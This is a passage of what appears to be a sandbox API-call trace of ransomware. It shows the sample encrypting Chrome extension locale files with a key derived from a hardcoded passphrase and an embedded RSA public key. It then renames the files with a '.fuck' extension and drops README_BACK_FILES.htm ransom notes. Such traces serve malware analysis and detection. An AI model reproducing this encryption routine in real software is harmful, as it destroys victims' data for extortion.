dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.283] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.283] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.283] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.283] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293e910) returned 1 [0249.284] CryptImportPublicKeyInfo (in: hCryptProv=0x293e910, dwCertEncodingType=0x1, pInfo=0x29321e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932210*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932218*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937778) returned 1 [0249.284] CryptEncrypt (in: hKey=0x2937778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.284] CryptEncrypt (in: hKey=0x2937778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293e6f0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293e6f0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.284] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293e6f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293e6f0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.285] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdd, lpOverlapped=0x0) returned 1 [0249.286] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdd, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.286] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.286] CloseHandle (hObject=0x5d58) returned 1 [0249.286] CloseHandle (hObject=0x5d5c) returned 1 [0249.286] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), bFailIfExists=0) returned 1 [0249.289] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json", dwFileAttributes=0x0) returned 1 [0249.290] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.gsg")) returned 1 [0249.291] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.fuck")) returned 1 [0249.291] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.292] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.292] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.292] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.292] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.292] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\readme_back_files.htm")) returned 0xffffffff [0249.292] AreFileApisANSI () returned 1 [0249.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.292] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.292] GetFileType (hFile=0x5d54) returned 0x1 [0249.292] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.293] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.293] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.294] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.294] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.294] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.294] GetLastError () returned 0x0 [0249.294] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json")) returned 0x20 [0249.294] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json", dwFileAttributes=0x80) returned 1 [0249.294] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.295] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.295] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.296] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.298] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.298] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.298] CryptHashData (hHash=0x2938978, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.298] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.298] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.298] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.298] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293ee60) returned 1 [0249.300] CryptImportPublicKeyInfo (in: hCryptProv=0x293ee60, dwCertEncodingType=0x1, pInfo=0x2932c70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932ca0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932ca8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29380b8) returned 1 [0249.300] CryptEncrypt (in: hKey=0x29380b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.300] CryptEncrypt (in: hKey=0x29380b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293e888*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293e888*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.300] WriteFile (in: hFile=0x5d58, lpBuffer=0x293e888*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293e888*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.301] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xda, lpOverlapped=0x0) returned 1 [0249.302] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xda, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.302] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.302] CloseHandle (hObject=0x5d5c) returned 1 [0249.302] CloseHandle (hObject=0x5d58) returned 1 [0249.302] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), bFailIfExists=0) returned 1 [0249.305] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json", dwFileAttributes=0x0) returned 1 [0249.305] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.gsg")) returned 1 [0249.306] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.fuck")) returned 1 [0249.307] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.307] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.307] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.307] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.307] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.312] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\readme_back_files.htm")) returned 0xffffffff [0249.312] AreFileApisANSI () returned 1 [0249.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.312] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.312] GetFileType (hFile=0x5d54) returned 0x1 [0249.312] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.313] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.313] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.314] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.314] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.314] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.314] GetLastError () returned 0x0 [0249.314] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json")) returned 0x20 [0249.315] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json", dwFileAttributes=0x80) returned 1 [0249.315] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.315] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.316] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.316] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.318] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.318] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.318] CryptHashData (hHash=0x2938978, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.318] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29374f8) returned 1 [0249.318] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.318] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.318] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293e778) returned 1 [0249.319] CryptImportPublicKeyInfo (in: hCryptProv=0x293e778, dwCertEncodingType=0x1, pInfo=0x29326c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29326f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29326f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937f78) returned 1 [0249.319] CryptEncrypt (in: hKey=0x2937f78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.319] CryptEncrypt (in: hKey=0x2937f78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293e998*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293e998*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.319] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293e998*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293e998*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.320] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe4, lpOverlapped=0x0) returned 1 [0249.321] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe4, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0249.321] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0249.321] CloseHandle (hObject=0x5d58) returned 1 [0249.321] CloseHandle (hObject=0x5d5c) returned 1 [0249.321] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), bFailIfExists=0) returned 1 [0249.324] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 